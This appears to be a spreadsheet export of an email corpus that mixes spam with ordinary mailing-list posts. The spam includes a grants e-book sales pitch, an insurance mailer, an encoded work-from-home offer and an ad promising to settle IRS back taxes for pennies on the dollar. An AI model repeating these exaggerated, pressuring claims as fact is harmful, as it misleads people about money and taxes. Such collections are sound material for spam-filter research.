 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;THIS INFO ALONE IS WORTH
 THOUSANDS OF DOLLARS - I GUARANTEE YOU CAN PURCHASE A GRANTS CD OR INFO
 ANYWHERE, AND YOU WILL NOT RECEIVE THIS DOWNLOADABLE SOFTWARE THAT ACTUALLY
 SHOWS YOU HOW TO APPLY AND WHAT TO SAY, SO THAT YOU ARE ACCEPTED FOR A
 GRANT !!!&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This interactive software
 tool will walk you through the grant-writing process and will teach you
 everything you need to know to write competitive grants proposals.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The program includes:&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;ul&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;detailed information and
 tips on writing grants proposals;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;how to complete a grant
 application package;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;examples of good, complete
 grant packages;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a glossary of grants terms;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;resources and contacts;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;a mock grants-writing activity
 where you will be able to compare your results to a successful grant application&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;plus much much more&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;/ul&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #2:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Insider Information
 Report: 61 Ways To Save Money&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;This valuable special report
 contains insider experts tips and techniques that will help you to save
 thousands of Dollars. You'll discover little known secrets and tricks to
 saving money on airline fares, car rental, new and used car buying, auto
 leasing, gasoline, car repairs, auto insurance, life insurance, savings
 and investment, credit cards, home equity loans, home purchase, major appliances,
 home heating, telephone services, food purchase, prescription drugs and
 more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #3:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;The Complete Guide To
 Starting Your Own Business&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;A
 comprehensive manual that will give you all the guidelines and tools you
 need to start and succeed in a business of your own, packed with guides,
 forms, worksheets and checklists. You will be amazed at how simple these
 strategies and concepts are and how easy it will be for you to apply them
 to your own business idea. Hundreds were sold separately at $40 each...
 you get it here for free.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Here's
 just a taste of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to determine the feasibility of your business idea. A complete fill in
 the blanks template system that will help you predict problems before they
 happen and keep you from losing your shirt on dog business ideas.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A step by step explanation
 of how to develop a business plan that will make bankers, prospective partners
 and investors line up at your door. Plus, a complete ready made business
 plan template you can easily adapt to your exact needs.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Discover the easiest, simplest
 ways to find new products for your business that people are anxious to
 buy.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;How
 to make money with your new idea or invention. Secrets of making sure you
 put cash in your pocket on your very first idea business venture.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Complete, step by step instructions
 on how to plan and start a new business. This is must-know must-do information;
 ignore it and you stand a good chance to fail. You get specifically designed
 instructions for each of the following: a service business, a retail store,
 a home based business, a manufacturing company, and more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What nobody ever told you
 about raising venture capital money. Insider secrets of attracting investors,
 how to best construct your proposal, common mistakes and traps to avoid,
 and much more.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Checklist
 for entering into a partnership. Keeps you from costly mistakes when forming
 a partnership.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;How to select a franchise
 business. A step by step guide to selecting a franchise that is best for
 you.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step-by-step
 organized program for cutting costs in your business. Clients of mine have
 achieved an average of 28% to 35% cost reduction with this technique, and
 you can too. Keep the money in your pocket with this one!&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;What are the secrets behind
 constructing a results driven marketing plan? I will lead you step by step
 into developing a marketing plan that will drive your sales through the
 roof.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;A complete step by step
 guide guaranteed to help you increase your profits by up to 64%, I call
 it "The Profit Planning Guide". This is a simple, practical, common sense
 strategy, but amazingly enough, almost no one understands or uses it.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;Free Bonus #4:&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Guide To Home Business
 Success&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;This
 is a&amp;nbsp;&lt;span STYLE="text-decoration: none"&gt;fast, no-frills&lt;/span&gt; guide
 to starting and succeeding in a home based business. Here's just a taste
 of what's in the guide:&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Home
 business: is it for you?&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;What
 are the secrets behind the people who have million dollar home based businesses?
 you'll find a 24 tip list proven to turn your home business into a money
 machine.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Laws and regulations you
 must be aware of to avoid legal errors.&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Planning
 a home based business&lt;b&gt; -&lt;/b&gt; Insider secrets and tips revealed for ensuring
 your success in a home business.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Fundamentals
 of home business financial planning.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;S&lt;font color="#000000"&gt;imple,
 easy to copy ideas that will enhance your image - and the response you
 get from your customers.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;Common
 problems in starting and managing a home based&amp;nbsp; business - and how
 to solve them once and for all.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;Who I Am and Why I'm Qualified
 to Give&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;br&gt;&lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#CC0000"&gt;You The Best Grants Advice
 Available&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I'm
 the president of a leading Internet based information business. I'm also
 the creator of "The Managing a Small Business CD-ROM" and the author of
 five books.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;I've
 been involved in obtaining grants and in small business for the past 23
 years of my life, as a business coach, a manager of a consulting firm,
 a seminar leader and as the owner of five successful businesses.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;During
 my career as a business coach and consultant I've helped dozens of business
 owners obtain government grants, start their businesses, market, expand,
 get out of troubles, sell their businesses and do practically every other
 small business activity you can think of.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;The
 Guide presented here contains every tip, trick, technique and strategy
 I've learned during my 23 year career. You practically get my whole brain
 in a form of an E-book.&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;b&gt;&lt;font face="Arial"&gt;&lt;font color="#0000CC"&gt;How the Grants Guide is priced?&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;The Complete Guide To
 Government Grants&lt;/b&gt; is normally priced at $50, but...&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;... as part of an Online
 marketing test, if you purchase from this sale you pay only $19.99 (that's
 75% off ...plus, you still get the FREE valuable bonuses.)&lt;/font&gt;&lt;/font&gt;&lt;/blockquote&gt;
 &lt;blockquote&gt;&lt;b&gt;&lt;font face="Verdana"&gt;&lt;font color="#000000"&gt;&lt;font size=-1&gt;If
 you are serious about obtaining free grants money, you &lt;u&gt;need&lt;/u&gt; this
 guide. Don't delay a moment longer. Order Now !!!&amp;nbsp;&lt;/font&gt;&lt;/font&gt;&lt;/font&gt;&lt;/b&gt;&lt;/blockquote&gt;
 &lt;font face="Verdana"&gt;&lt;font size=-1&gt;&lt;b&gt;P.S.&lt;/b&gt; The Complete Guide To Government
 Grants will make a huge difference. You risk nothing. The guide is not
 the original price of $50, but only $19.99 (&lt;u&gt;if you purchase through
 this sale &lt;/u&gt;) and comes with a one year money back guarantee. And you
 get four valuable free bonuses which you may keep regardless. Don't delay
 a moment longer, ORDER NOW !!!!&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;p STYLE="margin-bottom: 0cm"&gt;&lt;font face="Verdana"&gt;&lt;font size=-1&gt;Shipping
 and Handling is &lt;b&gt;&lt;font color="#CC0000"&gt;FREE&lt;/font&gt;&lt;/b&gt; since we will
 email you all of this info via access to our secure website which contains
 everything described above.&lt;/font&gt;&lt;/font&gt;
 &lt;br&gt;
 &lt;hr&gt;
 &lt;center&gt;
 &lt;p&gt;&amp;nbsp;&lt;font color="#FF0000"&gt;&lt;font size=+4&gt;&lt;a href="http://www.2003marketing.com/grants.htm"&gt;Order
 Now!!!&lt;/a&gt;&lt;/font&gt;&lt;/font&gt;&lt;/center&gt;
 &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;&lt;/center&gt;
 &lt;p&gt;&lt;a NAME="ebayphotohosting"&gt;&lt;/a&gt;&lt;a NAME="ebaylargephotohosting"&gt;&lt;/a&gt;
 &lt;br&gt;&amp;nbsp;
 &lt;/body&gt;
 &lt;/html&gt;
 1051Ul5
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Canadians
</t>
  </si>
  <si>
    <t xml:space="preserve"> From the local paper this morning.
 "Canadians eat about seven times as many doughnuts per capita"... (as 
 Americans) . D'oh!
 Owen
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Your Family Needs You
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;&lt;HEAD&gt;
 &lt;META HTTP-EQUIV=3D"Content-Type" CONTENT=3D"text/html; charset=3Dus-ascii=
 "&gt;
 &lt;/HEAD&gt;
 &lt;CENTER&gt;&lt;BR&gt;
 &lt;TABLE cellSpacing=3D0 cellPadding=3D1 width=3D468 border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=3Dtop&gt;
 &lt;TD bgColor=3D#0099ff rowSpan=3D7&gt;
 &lt;TABLE cellPadding=3D1 width=3D468 bgColor=3D#ffffff border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR vAlign=3Dtop&gt;
 &lt;TD&gt;&lt;A href=3D"http://www.interactive-mailing.com/b012/insurance/"&gt;&lt;IMG
 height=3D100 src=3D"http://61.129.81.99/infomates/insurance/images/lo.gif"=
  width=3D326 border=3D0
 NOSEND=3D"1"&gt;&lt;/A&gt;&lt;/TD&gt;
 &lt;TD align=3Dright width=3D100&gt;
 &lt;DIV align=3Dcenter&gt;&lt;A
 href=3D"http://www.interactive-mailing.com/b012/insurance/"&gt;&lt;IMG
 height=3D100 src=3D"http://61.129.81.99/infomates/insurance/images/sa.gif"=
  width=3D100 border=3D0
 NOSEND=3D"1"&gt;&lt;/A&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR bgColor=3D#ffffff&gt;
 &lt;TD colSpan=3D2&gt;
 &lt;TABLE height=3D1 cellSpacing=3D0 cellPadding=3D0 width=3D468
 bgColor=3D#0099ff border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD height=3D1&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;
 &lt;TABLE width=3D466 align=3Dcenter bgColor=3D#ffffff border=3D0&gt;
 &lt;TBODY&gt;
 &lt;TR&gt;
 &lt;TD vAlign=3Dcenter align=3Dleft&gt;
 &lt;P&gt;&lt;FONT color=3D#000099&gt;&lt;B&gt;&lt;FONT
 face=3D"Arial, Helvetica, sans-serif" size=3D+1&gt;Three Minutes
 Now...&lt;BR&gt;A Lifetime of Protection.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P&gt;&lt;FONT color=3D#000099&gt;&lt;B&gt;&lt;FONT
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;Protecting your
 family...it only takes a few minutes to get peace of mind. You
 need to know that your family will be alright if something
 happens to you.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;
 &lt;P align=3Dleft&gt;&lt;FONT color=3D#000099&gt;&lt;B&gt;&lt;FONT
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;Get a&lt;/FONT&gt;&lt;FONT
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;ffordable quotes on
 thousands of plans from the nation's strongest insurance
 companies. Visit Quote Advantage now to see how we make &lt;A
 href=3D"http://www.interactive-mailing.com/b012/insurance/"&gt;Term
 Life Insurance&lt;/A&gt; simple.&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/P&gt;&lt;/TD&gt;
 &lt;TD align=3Dright width=3D151 rowSpan=3D2&gt;&lt;IMG height=3D309
 src=3D"http://61.129.81.99/infomates/insurance/images/fa.jpg" width=3D198
 NOSEND=3D"1"&gt;&lt;/TD&gt;&lt;/TR&gt;
 &lt;TR&gt;
 &lt;TD vAlign=3Dcenter align=3Dleft&gt;
 &lt;DIV align=3Dcenter&gt;&lt;FONT color=3D#000099&gt;&lt;B&gt;&lt;FONT
 face=3D"Arial, Helvetica, sans-serif" size=3D2&gt;&lt;A
 href=3D"http://www.interactive-mailing.com/b012/insurance"&gt;&lt;IMG
 height=3D26 src=3D"http://61.129.81.99/infomates/insurance/images/ch.gif" =
 width=3D221
 align=3Dmiddle border=3D0
 NOSEND=3D"1"&gt;&lt;/A&gt;&lt;/FONT&gt;&lt;/B&gt;&lt;/FONT&gt;&lt;/DIV&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/=
 TR&gt;
 &lt;TR&gt;
 &lt;TD align=3Dleft&gt;&lt;FONT face=3D"Arial, Helvetica, sans-serif"
 color=3D#000099 size=3D1&gt;Copyright JBM, Inc.&lt;/FONT&gt;&lt;/TD&gt;
 &lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;/TD&gt;&lt;/TR&gt;&lt;/TBODY&gt;&lt;/TABLE&gt;&lt;FONT
 face=3DArial
 size=3D1 COLOR=3D"#FFCCFF"&gt;&lt;BR&gt;&lt;BR&gt;+++++++++++++++++++++++++++++++++++++++=
 +++++++++++++&lt;BR&gt;&lt;br&gt;&lt;BR&gt;&lt;br&gt;
 We search for the best offering's for&lt;br&gt;
 you; we do the research and you get only The superior results&lt;br&gt;
 this  email is brought to you by; JBM. . To abnegate&lt;br&gt;
 all future notices, please &lt;A HREF=3D"http://www.interactive-mailing.com/b=
 012/"&gt;Enter here&lt;/A&gt;&lt;/FONT&gt;
 &lt;/BODY&gt;&lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Heh heh heh -- Geekmod!
</t>
  </si>
  <si>
    <t xml:space="preserve">Hello fork,
   Whilst digitally meandering around google answers
   (answers.google.com) I came upon an interesting question:  'Whats
   the coolest geektoy for under $50'  and an equally nifty answer
   (albiet a bit off the mark for the question, but it wasn't my money,
   so who cares).
   http://www.soundwise.org/id49.htm
   Hee.   Visualization with real lights instead of just winamp.
   Sliiiiccckk.
 -- 
 Best regards,
  bitbitch                          mailto:bitbitch@magnesium.net
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">------=_NextPart_000_00C3_65E56B8D.B3612A36
 Content-Type: text/plain; charset="iso-8859-1"
 Content-Transfer-Encoding: base64
 SGVscCB3YW50ZWQuICBXZSBhcmUgYSAxNCB5ZWFyIG9sZCBmb3J0dW5lIDUw
 MCBjb21wYW55LCB0aGF0IGlzDQpncm93aW5nIGF0IGEgdHJlbWVuZG91cyBy
 YXRlLiAgV2UgYXJlIGxvb2tpbmcgZm9yIGluZGl2aWR1YWxzIHdobw0Kd2Fu
 dCB0byB3b3JrIGZyb20gaG9tZS4NCg0KVGhpcyBpcyBhbiBvcHBvcnR1bml0
 eSB0byBtYWtlIGFuIGV4Y2VsbGVudCBpbmNvbWUuICBObyBleHBlcmllbmNl
 DQppcyByZXF1aXJlZC4gIFdlIHdpbGwgdHJhaW4geW91Lg0KDQpTbyBpZiB5
 b3UgYXJlIGxvb2tpbmcgdG8gYmUgZW1wbG95ZWQgZnJvbSBob21lIHdpdGgg
 YSBjYXJlZXIgdGhhdCBoYXMNCnZhc3Qgb3Bwb3J0dW5pdGllcywgdGhlbiBn
 bzoNCg0KaHR0cDovL3d3dy5iYXNldGVsLmNvbToyNzAwMC93ZWFsdGhub3cN
 Cg0KV2UgYXJlIGxvb2tpbmcgZm9yIGVuZXJnZXRpYyBhbmQgc2VsZiBtb3Rp
 dmF0ZWQgcGVvcGxlLiAgSWYgdGhhdCBpcyB5b3UNCnRoYW4gY2xpY2sgb24g
 dGhlIGxpbmsgYW5kIGZpbGwgb3V0IHRoZSBmb3JtLCBhbmQgb25lIG9mIG91
 cg0KZW1wbG95ZW1lbnQgc3BlY2lhbGlzdCB3aWxsIGNvbnRhY3QgeW91Lg0K
 DQpUbyBiZSByZW1vdmVkIGZyb20gb3VyIGxpbmsgc2ltcGxlIGdvIHRvOg0K
 DQpodHRwOi8vd3d3LmJhc2V0ZWwuY29tL3JlbW92ZS5odG1sDQoNCg==
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [WM] Problem with textarea tags
</t>
  </si>
  <si>
    <t xml:space="preserve">I had a problem with extra whitespace being added between textarea tags.
 Solved the problem by adding textarea to $INLINE_TAGS= list in
 HTMLCleaner.pm
 Hope this might help someone else
 Joe
 -------------------------------------------------------
 This sf.net email is sponsored by: OSDN - Tired of that same old
 cell phone?  Get a new here for FREE!
 https://www.inphonic.com/r.asp?r=sourceforge1&amp;refcode1=vs3390
 _______________________________________________
 webmake-talk mailing list
 webmake-talk@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/webmake-talk
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Do You Owe Back Taxes? obd
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;
 &lt;body&gt;
 &lt;font size="2" PTSIZE="10"&gt;
 &lt;table height="338" cellSpacing="0" cellPadding="0" width="548" border="0" style="border-style:double; border-color:#FFFFFF; border-collapse:collapse; padding-left:4; padding-right:4; padding-top:1; padding-bottom:1" bordercolor="#111111" bordercolorlight="#FFFFFF" bordercolordark="#FFFFFF" bgcolor="#FFFFFF"&gt;
   &lt;tr&gt;
     &lt;td width="13" height="423"&gt;&amp;nbsp;&lt;/td&gt;
     &lt;td vAlign="top" align="left" width="535" height="423" style="border-style: solid; border-width: 0"&gt;
     &lt;table cellSpacing="0" cellPadding="4" width="95%" border="0" bgcolor="#FFFFFF" style="border-style:double; border-width:12; border-collapse: collapse" bordercolor="#FF0000"&gt;
       &lt;tr&gt;
         &lt;td vAlign="top" align="right" height="424"&gt;
         &lt;table cellSpacing="0" cellPadding="0" width="100%" border="0"&gt;
           &lt;tr&gt;
             &lt;td bgcolor="#0359A2"&gt;
             &lt;div align="center"&gt;
               &lt;font face="Verdana" style="font-size: 30pt; font-weight: 700" color="#FFFFFF"&gt;
               &amp;nbsp;&lt;/font&gt;&lt;b&gt;&lt;font face="Verdana" color="#FFFFFF" size="6"&gt;IRS TAX 
               PROBLEMS?&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font color="#FFFFFF"&gt;&lt;span style="font-weight: 700"&gt;
               &lt;font face="Verdana" style="font-size: 10.5pt"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
               &lt;/font&gt;&lt;/span&gt;&lt;/font&gt;
               &lt;font color="#FFFFFF" face="Verdana" size="5"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/font&gt;
               &lt;font color="#FFFFFF" face="Verdana" size="6"&gt;It's Time to&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;
               &lt;/font&gt;&lt;font face="Verdana" color="#FFFFFF" size="7"&gt;Eliminate&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;font face="Verdana" size="5" color="#FFFFFF"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               your IRS tax problems&lt;/font&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &lt;b&gt;&lt;font face="Verdana" color="#FFFFFF" style="font-size: 42pt"&gt;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; 
               NOW!&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="left"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;font color="#FFFFFF"&gt;&lt;b&gt;
               &lt;font face="Verdana" style="font-size: 10.5pt"&gt;&amp;nbsp;&amp;nbsp; &lt;/font&gt;
               &lt;/b&gt;&lt;/font&gt;&lt;span style="font-weight: 700"&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" style="font-size: 16pt" color="#FFFFFF"&gt;
               Let Our Qualified People HELP You&lt;/font&gt;&lt;/span&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;div align="center"&gt;
               &lt;b&gt;
               &lt;font face="Verdana, Arial, Helvetica, sans-serif" color="#FFFFFF" size="4"&gt;
               We Can Settle Your Back Taxes For PENNIES On The Dollar&lt;/font&gt;&lt;/b&gt;&lt;/div&gt;
             &lt;div align="center"&gt;
               &amp;nbsp;&lt;/div&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
           &lt;/table&gt;
         &lt;table cellSpacing="0" cellPadding="3" width="505" border="0"&gt;
           &lt;tr&gt;
             &lt;td colSpan="2" height="64" bgcolor="#0359A2" width="499"&gt;
             &lt;b&gt;
             &lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2"&gt;
             &lt;table cellSpacing="2" cellPadding="0" width="482" border="0" height="38"&gt;
               &lt;tr&gt;
                 &lt;td width="327" height="36" style="border-style: solid; border-width: 0"&gt;
                 &lt;font size="2" color="#FFFFFF"&gt;Respond&lt;/font&gt;&lt;/font&gt;&lt;font face="Verdana,Arial,Helvetica,sans-serif" size="2" color="#FFFFFF"&gt; 
                 now and one of our Debt Pros will get back to you within 48 
                 hours.&lt;/font&gt;&lt;/td&gt;
                 &lt;td width="141" bgcolor="#FF0000" height="36" style="border-left-style: solid; border-left-width: 1"&gt;
                 &lt;p align="center"&gt;&lt;b&gt;&lt;font color="#FFFFFF" size="4"&gt;
                 &lt;a style="text-decoration: none" href="http://66.231.133.72/irshelp/index.htm?ID=t16"&gt;
                 &lt;font color="#FFFFFF"&gt;CLICK HERE!&lt;/font&gt;&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/font&gt;
             &lt;/b&gt;&lt;/td&gt;
           &lt;/tr&gt;
         &lt;/table&gt;
         &lt;/td&gt;
       &lt;/tr&gt;
     &lt;/table&gt;
     &lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;If You wish to be removed from future mailings please &amp;quot;&lt;a href="http://66.231.133.68/final/index_remoov.html?ID=t16"&gt;Clicking 
 Here&lt;/a&gt;&amp;quot; . &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &lt;br&gt;
 &amp;nbsp;&lt;/font&gt;&lt;/p&gt;
 &lt;/body&gt;
